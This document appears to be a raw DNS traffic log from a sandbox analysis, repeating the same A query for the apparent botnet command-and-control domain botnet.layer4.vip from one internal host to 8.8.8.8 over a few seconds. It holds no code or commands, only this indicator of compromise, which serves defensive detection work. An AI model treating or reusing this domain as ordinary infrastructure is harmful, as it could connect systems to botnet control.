                                  Apr 9, 2023 03:31:15.008294106 CEST192.168.2.238.8.8.80xade4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.032794952 CEST192.168.2.238.8.8.80xf81fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.048568964 CEST192.168.2.238.8.8.80xf81fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.072978973 CEST192.168.2.238.8.8.80xf81fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.088594913 CEST192.168.2.238.8.8.80xf81fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.104502916 CEST192.168.2.238.8.8.80xf81fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.128947020 CEST192.168.2.238.8.8.80xde2fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.153377056 CEST192.168.2.238.8.8.80xde2fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.177726030 CEST192.168.2.238.8.8.80xde2fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.202234983 CEST192.168.2.238.8.8.80xde2fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.217776060 CEST192.168.2.238.8.8.80xde2fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.242320061 CEST192.168.2.238.8.8.80xa643Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.266727924 CEST192.168.2.238.8.8.80xa643Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.291100979 CEST192.168.2.238.8.8.80xa643Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.315639973 CEST192.168.2.238.8.8.80xa643Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.339787960 CEST192.168.2.238.8.8.80xa643Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.355379105 CEST192.168.2.238.8.8.80xbcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.379492044 CEST192.168.2.238.8.8.80xbcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.394967079 CEST192.168.2.238.8.8.80xbcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.410557985 CEST192.168.2.238.8.8.80xbcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.434772015 CEST192.168.2.238.8.8.80xbcaeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.458956957 CEST192.168.2.238.8.8.80x3749Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.474852085 CEST192.168.2.238.8.8.80x3749Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.499247074 CEST192.168.2.238.8.8.80x3749Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.523778915 CEST192.168.2.238.8.8.80x3749Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.539690971 CEST192.168.2.238.8.8.80x3749Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.564392090 CEST192.168.2.238.8.8.80x6c63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.588587046 CEST192.168.2.238.8.8.80x6c63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.613168955 CEST192.168.2.238.8.8.80x6c63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.637783051 CEST192.168.2.238.8.8.80x6c63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.661978006 CEST192.168.2.238.8.8.80x6c63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.686691999 CEST192.168.2.238.8.8.80x9507Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.714283943 CEST192.168.2.238.8.8.80x9507Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.738842964 CEST192.168.2.238.8.8.80x9507Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.763079882 CEST192.168.2.238.8.8.80x9507Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.787524939 CEST192.168.2.238.8.8.80x9507Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.812135935 CEST192.168.2.238.8.8.80x7531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.827779055 CEST192.168.2.238.8.8.80x7531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.852004051 CEST192.168.2.238.8.8.80x7531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.867568016 CEST192.168.2.238.8.8.80x7531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.883352041 CEST192.168.2.238.8.8.80x7531Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.907377958 CEST192.168.2.238.8.8.80xfcfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.923176050 CEST192.168.2.238.8.8.80xfcfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.939326048 CEST192.168.2.238.8.8.80xfcfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.963475943 CEST192.168.2.238.8.8.80xfcfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.987991095 CEST192.168.2.238.8.8.80xfcfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.003719091 CEST192.168.2.238.8.8.80x90d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.019349098 CEST192.168.2.238.8.8.80x90d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.043785095 CEST192.168.2.238.8.8.80x90d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.068036079 CEST192.168.2.238.8.8.80x90d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.092398882 CEST192.168.2.238.8.8.80x90d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.116960049 CEST192.168.2.238.8.8.80xe0d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.132911921 CEST192.168.2.238.8.8.80xe0d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.148816109 CEST192.168.2.238.8.8.80xe0d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.173211098 CEST192.168.2.238.8.8.80xe0d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.189038992 CEST192.168.2.238.8.8.80xe0d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.213349104 CEST192.168.2.238.8.8.80xd08cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.229038000 CEST192.168.2.238.8.8.80xd08cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.253256083 CEST192.168.2.238.8.8.80xd08cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.268814087 CEST192.168.2.238.8.8.80xd08cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.284395933 CEST192.168.2.238.8.8.80xd08cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.300559998 CEST192.168.2.238.8.8.80x61b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.316236973 CEST192.168.2.238.8.8.80x61b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.332281113 CEST192.168.2.238.8.8.80x61b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.356856108 CEST192.168.2.238.8.8.80x61b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.381185055 CEST192.168.2.238.8.8.80x61b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.397288084 CEST192.168.2.238.8.8.80x5c77Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.421726942 CEST192.168.2.238.8.8.80x5c77Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.446379900 CEST192.168.2.238.8.8.80x5c77Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.461893082 CEST192.168.2.238.8.8.80x5c77Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.486223936 CEST192.168.2.238.8.8.80x5c77Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.510377884 CEST192.168.2.238.8.8.80x854fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.525819063 CEST192.168.2.238.8.8.80x854fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.541353941 CEST192.168.2.238.8.8.80x854fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.565721989 CEST192.168.2.238.8.8.80x854fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.581163883 CEST192.168.2.238.8.8.80x854fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.596816063 CEST192.168.2.238.8.8.80xaea7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.612334013 CEST192.168.2.238.8.8.80xaea7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.636395931 CEST192.168.2.238.8.8.80xaea7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.660826921 CEST192.168.2.238.8.8.80xaea7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.685012102 CEST192.168.2.238.8.8.80xaea7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.713361979 CEST192.168.2.238.8.8.80x45a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.737629890 CEST192.168.2.238.8.8.80x45a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.761893988 CEST192.168.2.238.8.8.80x45a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.777869940 CEST192.168.2.238.8.8.80x45a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.802453995 CEST192.168.2.238.8.8.80x45a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.818568945 CEST192.168.2.238.8.8.80xe0acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.834405899 CEST192.168.2.238.8.8.80xe0acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.850258112 CEST192.168.2.238.8.8.80xe0acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.866156101 CEST192.168.2.238.8.8.80xe0acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.882164955 CEST192.168.2.238.8.8.80xe0acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.897867918 CEST192.168.2.238.8.8.80xf463Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.913558006 CEST192.168.2.238.8.8.80xf463Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.928961992 CEST192.168.2.238.8.8.80xf463Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.944780111 CEST192.168.2.238.8.8.80xf463Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.960318089 CEST192.168.2.238.8.8.80xf463Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.976170063 CEST192.168.2.238.8.8.80x84eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.000448942 CEST192.168.2.238.8.8.80x84eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.016063929 CEST192.168.2.238.8.8.80x84eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.032026052 CEST192.168.2.238.8.8.80x84eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.056433916 CEST192.168.2.238.8.8.80x84eeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.072560072 CEST192.168.2.238.8.8.80x6f5aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.088377953 CEST192.168.2.238.8.8.80x6f5aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.103975058 CEST192.168.2.238.8.8.80x6f5aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.119750977 CEST192.168.2.238.8.8.80x6f5aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.144381046 CEST192.168.2.238.8.8.80x6f5aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.160471916 CEST192.168.2.238.8.8.80x3e69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.185050964 CEST192.168.2.238.8.8.80x3e69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.209263086 CEST192.168.2.238.8.8.80x3e69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.233823061 CEST192.168.2.238.8.8.80x3e69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.258315086 CEST192.168.2.238.8.8.80x3e69Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.283010006 CEST192.168.2.238.8.8.80xbdb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.298650026 CEST192.168.2.238.8.8.80xbdb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.323256016 CEST192.168.2.238.8.8.80xbdb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.339517117 CEST192.168.2.238.8.8.80xbdb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.363831043 CEST192.168.2.238.8.8.80xbdb2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.388252020 CEST192.168.2.238.8.8.80xcc35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.404254913 CEST192.168.2.238.8.8.80xcc35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.420409918 CEST192.168.2.238.8.8.80xcc35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.444720984 CEST192.168.2.238.8.8.80xcc35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.460443020 CEST192.168.2.238.8.8.80xcc35Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.476458073 CEST192.168.2.238.8.8.80x37f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.501029968 CEST192.168.2.238.8.8.80x37f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.516997099 CEST192.168.2.238.8.8.80x37f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.532736063 CEST192.168.2.238.8.8.80x37f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.557013988 CEST192.168.2.238.8.8.80x37f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.581222057 CEST192.168.2.238.8.8.80x60abStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.597143888 CEST192.168.2.238.8.8.80x60abStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.621252060 CEST192.168.2.238.8.8.80x60abStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.645411968 CEST192.168.2.238.8.8.80x60abStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.661274910 CEST192.168.2.238.8.8.80x60abStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.677181959 CEST192.168.2.238.8.8.80x3a3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.709789991 CEST192.168.2.238.8.8.80x3a3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.725533962 CEST192.168.2.238.8.8.80x3a3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.741067886 CEST192.168.2.238.8.8.80x3a3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.765526056 CEST192.168.2.238.8.8.80x3a3bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.781258106 CEST192.168.2.238.8.8.80xfbeaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.797446012 CEST192.168.2.238.8.8.80xfbeaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.813143015 CEST192.168.2.238.8.8.80xfbeaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.828881979 CEST192.168.2.238.8.8.80xfbeaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.844799042 CEST192.168.2.238.8.8.80xfbeaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.860872984 CEST192.168.2.238.8.8.80x9be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.885550976 CEST192.168.2.238.8.8.80x9be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.901629925 CEST192.168.2.238.8.8.80x9be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.917783022 CEST192.168.2.238.8.8.80x9be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.934025049 CEST192.168.2.238.8.8.80x9be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.958868980 CEST192.168.2.238.8.8.80xa309Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.983268023 CEST192.168.2.238.8.8.80xa309Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.007612944 CEST192.168.2.238.8.8.80xa309Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.023375034 CEST192.168.2.238.8.8.80xa309Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.047754049 CEST192.168.2.238.8.8.80xa309Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.072393894 CEST192.168.2.238.8.8.80xe2a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.096487045 CEST192.168.2.238.8.8.80xe2a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.112495899 CEST192.168.2.238.8.8.80xe2a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.128140926 CEST192.168.2.238.8.8.80xe2a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.144113064 CEST192.168.2.238.8.8.80xe2a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.168934107 CEST192.168.2.238.8.8.80x24fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.193154097 CEST192.168.2.238.8.8.80x24fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.217648029 CEST192.168.2.238.8.8.80x24fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.242029905 CEST192.168.2.238.8.8.80x24fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.266953945 CEST192.168.2.238.8.8.80x24fcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.283322096 CEST192.168.2.238.8.8.80xdd23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.299356937 CEST192.168.2.238.8.8.80xdd23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.323788881 CEST192.168.2.238.8.8.80xdd23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.348300934 CEST192.168.2.238.8.8.80xdd23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.363955021 CEST192.168.2.238.8.8.80xdd23Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.388587952 CEST192.168.2.238.8.8.80xbc55Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.404829979 CEST192.168.2.238.8.8.80xbc55Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.421061039 CEST192.168.2.238.8.8.80xbc55Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.445588112 CEST192.168.2.238.8.8.80xbc55Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.470194101 CEST192.168.2.238.8.8.80xbc55Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.494735003 CEST192.168.2.238.8.8.80x6450Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.519285917 CEST192.168.2.238.8.8.80x6450Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.535417080 CEST192.168.2.238.8.8.80x6450Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.559890985 CEST192.168.2.238.8.8.80x6450Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.575727940 CEST192.168.2.238.8.8.80x6450Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.600833893 CEST192.168.2.238.8.8.80xa790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.616755009 CEST192.168.2.238.8.8.80xa790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.641463041 CEST192.168.2.238.8.8.80xa790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.666204929 CEST192.168.2.238.8.8.80xa790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.682394028 CEST192.168.2.238.8.8.80xa790Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.701256037 CEST192.168.2.238.8.8.80x2f28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.717108965 CEST192.168.2.238.8.8.80x2f28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.733274937 CEST192.168.2.238.8.8.80x2f28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.749403000 CEST192.168.2.238.8.8.80x2f28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.773813963 CEST192.168.2.238.8.8.80x2f28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.798424006 CEST192.168.2.238.8.8.80xa354Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.823219061 CEST192.168.2.238.8.8.80xa354Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.839356899 CEST192.168.2.238.8.8.80xa354Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.864026070 CEST192.168.2.238.8.8.80xa354Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.880111933 CEST192.168.2.238.8.8.80xa354Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.904917955 CEST192.168.2.238.8.8.80x2819Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.929711103 CEST192.168.2.238.8.8.80x2819Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.945600986 CEST192.168.2.238.8.8.80x2819Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.970205069 CEST192.168.2.238.8.8.80x2819Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.986253023 CEST192.168.2.238.8.8.80x2819Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.002125025 CEST192.168.2.238.8.8.80xd62bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
